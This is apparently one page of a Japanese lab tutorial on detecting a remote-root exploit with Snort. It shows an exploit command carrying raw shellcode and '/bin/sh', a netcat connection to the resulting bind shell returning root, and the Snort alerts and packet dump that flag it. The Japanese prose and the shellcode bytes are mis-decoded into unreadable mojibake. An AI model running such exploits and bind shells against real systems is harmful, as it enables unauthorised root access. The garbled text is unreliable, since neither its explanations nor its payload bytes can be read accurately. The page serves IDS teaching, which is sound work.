’Êí‚̃Aƒ^ƒbƒNi192.168.1.10 ¨ 192.168.1.4j
# ./exp 192.168.1.4 2600 ‰ãÑ™°f‰˜/E–ã‰]E‰] êI‰M©ME€1EEêAf‰]æd”åE‰Mè‹Eæ‡EEEƒ@¦ME€‰˜ACE‰˜AE‰’Ñ•Q?‰˜Ë€‰˜?EEE†F‰E EEU Eâßÿÿÿ/bin/sh êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ êŸ[ |
@‚Å‚ÍAnetcat‚ŃAƒ^ƒbƒN‚ª¬Œ÷‚µ‚½‚©‚ðŠm”F‚µ‚Ă݂悤B
# nc 192.168.1.4 3879 id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys), 4(adm),6(disk),10(wheel) |
@ƒAƒ^ƒbƒN‚ª¬Œ÷‚µAƒ|[ƒg3879‚Å/bin/sh‚ª“®ì‚µ‚Ä‚¢‚邱‚Æ‚ªŠm”F‚Å‚«‚éBƒT[ƒo‘¤‚Å‚ànetstatƒRƒ}ƒ“ƒh‚ÅŠm”F‚µ‚Ä‚Ý‚éB
# netstat -an | grep3879 tcp00 0.0.0.0:38790.0.0.0:* LISTEN |
@‚±‚ê‚ŃAƒ^ƒbƒN‚ͬŒ÷‚µ‚½BŽŸ‚ÉSnort‚̃ƒO‚ÅAUŒ‚‚ªŒŸ’m‚³‚ê‚Ä‚¢‚é‚©Šm”F‚·‚éBSnort‚̃Aƒ‰[ƒgƒƒO‚Ì1”Ô–Ú‚ÉAuSHELLCODE x86 NOOPv‚Æ‚µ‚ÄA¡‰ñ‚̃Aƒ^ƒbƒN‚ªŒŸ’m‚³‚ê‚Ä‚¢‚éB2‚–ڂ̃Aƒ‰[ƒgƒƒO‚ÍnetcatƒRƒ}ƒ“ƒh‚Å/bin/sh‚ÉÚ‘±‚µidƒRƒ}ƒ“ƒh‚ðŽÀs‚µ‚½Û‚̃ƒO‚¾B
ƒAƒ‰[ƒg
08/17-15:05:56.149304 [**] [1:648:5]
SHELLCODE x86 NOOP [**] [Classification: E xecutable code was detected] [Priority: 1] {TCP} 192.168.1.10:1026 -> 192.168.1.4:2600 08/17-15:09:44.413709[**] [1:498:3] ATTACK RESPONSES id check returned root [* *] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.1.4:3879 -> 192.168.1.10:1033 |
ƒƒO
[**] SHELLCODE
x86 NOOP [**] 08/17-15:15:13.000371 192.168.1.10:1034 -> 192.168.1.4:2600 TCP TTL:64 TOS:0x0 ID:1476 IpLen:20 DgmLen:1500 DF ***AP*** Seq: 0xDC6D5422Ack: 0xDCEDF57Win: 0x7D78TcpLen: 32 TCP Options (3) => NOP NOP TS: 132257 2202797 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90...... `ˆÈ‰º—ª` |
2/5 |